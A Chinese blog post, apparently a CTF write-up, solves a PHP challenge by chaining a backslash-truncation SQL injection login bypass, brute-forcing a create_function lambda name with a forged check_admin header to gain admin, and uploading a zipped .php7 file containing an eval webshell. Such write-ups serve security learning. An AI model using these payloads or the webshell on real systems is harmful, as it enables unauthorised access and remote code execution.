记录一道题(sql注入+ssrf+文件上传)

最新推荐文章于 2024-07-24 21:30:59 发布
最新推荐文章于 2024-07-24 21:30:59 发布
阅读量376 收藏
点赞数
分类专栏: 比赛wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/113790979
版权

拿到题目,学长给了hint,代码泄露,可以直接拿御剑扫,也可以在网站后面写/www.zip拿到源代码

看了题目后第一层有两个可能,一个是爆破进去,还有一个是sql注入,看源代码里有sql语句的拼接,而且爆破可能性太低,所以选择sql注入

sql注入

代码审计

function escape1($string){
    $a = 1;
    $b = 2;
    global $link;
    $string = $link->real_escape_string($string);
    return $string;
}

function check($seesee){
  $seesee = trim(escape1($seesee));
  if(strlen($seesee)<5){
    die("就这还想登录?");
  }
  if(strlen($seesee)>11){
    $seesee = substr($seesee, 0, 11);
  }
  return $seesee;
}

首先发现real_escape_string()有引号过滤,不止是引号过滤,反斜杠都过滤了

在这里插入图片描述
但是看第二个函数,如果字符串超过11个字符的时候只取下标为0-10的11个字符
所以我们可以这样输入:

username=\\\\\\
password=or 1=1#

为什么这样输入?
当用户名我们写六个反斜杠的时候,由于real_escape_string()这个函数把六个反斜杠转义成了12个反斜杠,超过了11个,所以只会截取11个反斜杠来sql拼接,妙就妙在这里了,sql语句拼接的时候是11个反斜杠,其中前10个都被转义了,而最后一个第11个恰巧单独出来了,把后面的引号给转义了,剩下的操作就简单了,所以实际上的sql语句就是这样的:

SELECT username, password FROM user WHERE username='\\\\\\\\\\\' && password='or 1=1 #'

登陆成功
在这里插入图片描述

ssrf

继续代审计

$remote_check_admin = create_function("",'if(isset($_SERVER["HTTP_CHECK_ADMIN"])){$_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_CHECK_ADMIN"];}');

eval("function admin_$rdmrd() {"
    ."global \$remote_check_admin; \$remote_check_admin();var_dump(1);"
    ."}");

send_to_phone($rdmrd);

$_GET['rdmrd']();

if($_SERVER['REMOTE_ADDR']=="127.0.0.1"){
    $_SESSION['admin'] = "True";
    echo "欢迎您admin,即将为您跳转到后台";
    sleep(3);
    echo "<script> alert('欢迎您admin,即将为您跳转到后台');parent.location.href='./admin.php'; </script>";
}

$_SERVER['REMOTE_ADDR']=="127.0.0.1"看到这一步就知道是ssrf了,需要调用网站本地的函数来验证身份
刚好就在上面有个匿名函数$_GET['rdmrd']();用get方式给rdmrd传一个函数名
看到这里有个这个东西

create_function("",'if(isset($_SERVER["HTTP_CHECK_ADMIN"])){$_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_CHECK_ADMIN"];}');

eval("function admin_$rdmrd() {"
    ."global \$remote_check_admin; \$remote_check_admin();var_dump(1);"
    ."}"); # 调用了上面这个函数

我百度了一下这两个东西create_function()$_SERVER["HTTP_CHECK_ADMIN"]

create_function()

首先看create_function()这篇博客讲的很详细了,这个函数虽说是创建匿名函数,但是这个函数还是有名字的
在这里插入图片描述
这篇博客就有写create_function()函数创建的匿名函数是%00lambda_%d,%d会递增
在这里插入图片描述
顺着这篇博客我发现可以通过爆破把这个数字爆出来,所以burp先预定了

$_SERVER[“HTTP_CHECK_ADMIN”]

这里我直接搜这个没搜到,于是就找了一个比较完整的自己找,这篇博客写的很全,还是没找到这个,但是我看到这些很相像,都是请求头的信息,所以我估计是他自己创的名字,只需要在请求头里加上这个项就可以了check_admin=127.0.0.1
在这里插入图片描述

这里整理一下这波ssrf的思路:

  • 首先给参数rdmrd传值,传的值应该是那个匿名函数的名字,%00lambda_x但是这个x这个数字我们不知道
  • 在请求头中加上check_admin=127.0.0.1

都要用burp来改包,所以第一步这个整数我们不知道可以直接爆破
在这里插入图片描述

在这里插入图片描述
跑完后会有不一样的出现,而服务器会记录下来,所以再去访问admin.php的时候就可以访问进去了(我这个是已经进去后有记录了的)
在这里插入图片描述在这里插入图片描述
下一步就是文件上传了

文件上传

代码审计

function Drawtarget($file,$path){
  $zipfile = new ZipArchive;
  if ($zipfile->open($file) === TRUE) {
    $zipfile->extractTo($path);
    $zipfile->close();
}
}
function SeeseeDir($path) {
    $papers = scandir($path);
    foreach ($papers as $document) {
        $address = "$path/$document";
        if (is_file($address)) {
            $section = pathinfo($document);
            $tailoring = strtolower($section['extension']);
            $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa","aSax","aScx","aShx","aSmx","cEr","sWf","swf","htaccess","ini");
            if (!in_array($tailoring, $deny_ext)) {
                @chmod($address, 0666);
            } else {
                @chmod($address, 0666);
                unlink($address);
            }
        } elseif ($document != '.' && $document != '..' && is_dir($address)) {
            CheckDir($address);
        }
    }
}

看到这个if (!in_array($tailoring, $deny_ext))就知道是一个黑名单,看黑名单里的东西,漏了php7
在这里插入图片描述
我一开始一直在尝试直接传php文件,大小写绕过也试过,但是莫得用,后来看到这个

function Drawtarget($file,$path){
  $zipfile = new ZipArchive;
  if ($zipfile->open($file) === TRUE) {
    $zipfile->extractTo($path);
    $zipfile->close();
}

百度了一下这个,他是把压缩文件解压,原来直接传zip就可以了,而且题目也明示叫我们传zip文件(滑稽)
所以把一句话木马写进去,后缀改成php7,放进一个压缩包里再传上去
写一句话木马

<?php @eval($_POST["1"]); ?>

在这里插入图片描述
给出文件地址,直接访问
在这里插入图片描述
可以看到传上去了(我传过两次,所以上面还有一个2.php7,是看phpinfo的)
在这里插入图片描述
打开蚁剑
在这里插入图片描述
连接成功了,flag也到手了
在这里插入图片描述

huamanggg
关注
专栏目录
【网络安全 | CTF】攻防世界 very_easy_sql 解详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 8521
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
[羊城杯 2020]easyser - 反序列化+SSRF+伪协议(绕过死亡die)
oZuoShen123的博客
10-08 990
F12看提示: 小胖说用个不安全的协议从我家才能进ser.php呢! ! 意思就是http协议就能进ser.php,回顾一下http协议咋用的?……
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1547
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网的方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
SQL注入——文件上传
heyingcheng的博客
03-11 2460
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
【CTFHub】ssrf漏洞--之上传文件
最新发布
weixin_57240513的博客
07-24 251
第一步:打开环境 第二步:访问flag.php 第三步:没有提交按钮,所以打开检查器,编辑html代码 第四步:修改代码如下图 第五步:点击提交按钮,抓包提交数据包 第六步:将host后面改为127.0.0.1:80,将数据包发送到repeater 第七步:将乱码的中文删掉重新输入两个中文字 第八步:将数据包保存为txt文件 第九步:将保存的数据包代码进行第一次编码 第十步:将第一次编码后的数据包ctrl+f替换,将%0A替换为%0A%0D再进行
ctfhub技能树-WEB(SQL注入文件上传)
Cobra的博客
09-21 1131
ctfhub技能树---WEB篇 SQL注入 整数型注入 1、判断注入类型 1 and 1=1 正常输出 1 and 1=2 不输出 (数字型注入) 2、猜解字段数 1 order by 2 页面回显正常 1 order by 3 页面无回显 字段数为2 3、查看显示位 -1 union select 1,2 显示位是Data 4、查看数据库名 -1 union select 1...
记一次文件上传引发的 SQL 注入
Restart的博客
01-06 782
本文作者:Jerry Shah (Jerry) 翻译作者:myh0st 在一次测试过程中,发现一个文件上传的入口,如图: 测试时,使用 burp 提交数据包时,将文件名处添加 XSS 的 Payload:("><img src=x onerror=alert(document.domain>.png) 然后,发现 xss 漏洞触发执行,算是一个 self-xss,危害有限: 关闭弹窗后,发现一些错误信息: 感觉文件是文件名在插入数据库时报的错,所以尝试将 xss 的 payloa.
原创:APT之网站SQL注入导致的文件任意上传
08-24
原创:APT之网站SQL注入导致的文件任意上传
SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞、文件上传、文件包含总结篇
m0_57379855的博客
03-23 5714
漏洞总结篇SQL注入修复过滤特殊字符修改php.in使用mysqli_real_escape_string()函数加固数据库方面加固管理方面 SQL注入 是指web应用程序对用户输入的数据的合法性没有判断或者没有严格的过滤,攻击者可以在web程序中把定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 就是使用某种手段,在原来的SQL语句基础上,添加一段恶意的SQL语句并执行,从而达到不被管理员允许的目
zimbra_poc:Zimbra XXE + SSRF + UPC Poc
03-16
Zimbra POC 用法 需要自己在源代码中修改dtd_url为如下内容的dtd地址: <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start " <![CDATA[ "> <!ENTITY % end " ]]> "> ...参考资料
Sql注入漏洞汇总-上
黑战士的博客
06-04 723
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
Proxylogon:ProxyLogon预授权SSRF到任意文件写入
03-12
ProxyLogon预授权SSRF到任意文件写入 用于教育和研究 经过测试: Windows-Python 3 / Linux-Python 3 时间线: 2021年3月8日,星期一:更新转储内容...(我还没有完成,您可以帮我完成这段代码吗;-;) 2021年3月9日,星期二:重制为简单的检查有效邮件 2021年3月10日,星期三:也许我正在执行此脚本,现在正在等待真正的CVE预身份验证 2021年3月11日,星期四:Proxylogon即将推出。 2021年3月12日,星期五:如果您不是脚本小子,您将知道如何运行proxylogon Sometime, some server extract domain tld is wrong Download users.txt list from github or u find it with Google Dork: intext:'
sql文件上传到服务器端,sql文件上传到云服务器
weixin_28813357的博客
08-10 633
sql文件上传到云服务器 内容精选换一换登录Windows操作系统的弹性云服务器时,需使用密码方式登录。因此,用户需先根据创建弹性云服务器时使用的密钥文件,获取该弹性云服务器初始安装时系统生成的管理员密码(Administrator帐户或Cloudbase-init设置的帐户)。该密码为随机密码,安全性高,请放心使用。请根据您的个人需求,通过管理控制台或API方式获取WindoGaussDB(fo...
蓝盾实训营day3——文件上传SQL注入进阶
mingC0758的博客
07-11 1068
cookie欺骗 原理:把登陆后的cookie保存下来,在其他地方访问页面时携带这个cookie.. https可能做不了这个实验 HTTP Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTPS Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTP Cookie ...
重走SQL注入文件上传
Pvr1sC的博客
01-30 490
主要是在DVWA上做做 SQL eg low php mysqli_query 如果是执行查询之类的语句( select ),那么会返回一个资源标识符,也就是我们要查找的数据结果集;如果是执行增删改之类的语句,返回的就是true或者false了。 mysqli_fetch_assoc() 函数从结果集中取得一行作为关联数组。该函数返回 的字段名是区分大小写的。 mysql_num_rows() 函数返回结果集中行的数目。 mysql_result() 函数返回结果集中一个字段的值。 REQUEST作为全局
DVWA文件包含,上传,sql注入靶场
iczfy585的博客
08-07 269
文件包含 什么是文件包含? 在php中文件包含主要是指调用了include(); include_once(); require(); require_once()函数。这些函数能够将包含的文本当做php代码去执行,而不管该文本是不是以php为扩展名的。文件包含可以分为本地文件包含()和远程文件包含。区别在于远程文件包含需要将php.ini文件中的 allow_url_fopen设置为On(默认...
ctfhub web-SSRF(服务器请求伪造) 文件上传
SinAlone的博客
06-30 408
提示:这次需要上传一个文件到flag.php了.祝你好运 使用file://伪协议查看flag.php的php源码 得知flag.php只接受来自127.0.0.1的访问 访问flag.php 观察到只有浏览文件没有提交文件,咱们打开f12自己给他加个提交。 然后选好要上传的文件成下图 文件随便是啥,咱就用个一句话木马 此时用burp抓包拦截请求,点击提交查询 得到如下包 将其中的Host内容改为 Host:127.0.0.1:80 之后将此包内容复制粘贴,
CTF的sql注入、文件包含、文件上传突破等五道
hclimg的博客
12-28 3334
使用win7建立一个ctf的环境,在本地测试实验 新手练习,在网上找了很多的资料   1、sql注入     http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+ http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)or...
ctfshow web224 sql_文件上传产生sql注入 详解
weixin_48083470的博客
10-04 2469
sql_文件上传产生注入 首先是扫描 或者 直觉检查 有个robots.txt 访问这个页面 发现可以重置密码,重置后admin登录,是个文件上传 测试下来不是文件上传的漏洞,题目也是提示的sql 我这里建了个bmp的文件可以成功上传 上传后发现 有两个参数 filename 和 filetype filename 会被重命名 filetype 应该就是不动 这两个应该是会存入数据库,产生注入 那么就是insert,那么就考了堆叠注入 思路到这就没了 改变http报文是改不了filetype的 应该是
SSRF+redis
08-24
通过这两种漏洞的结合,攻击者可以利用SSRF漏洞请求含有未授权访问漏洞的redis,然后通过redis的数据备份功能将恶意代码写入服务器的定时文件中,最终实现反弹shell攻击。<span class="em">1</span><span class="em...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值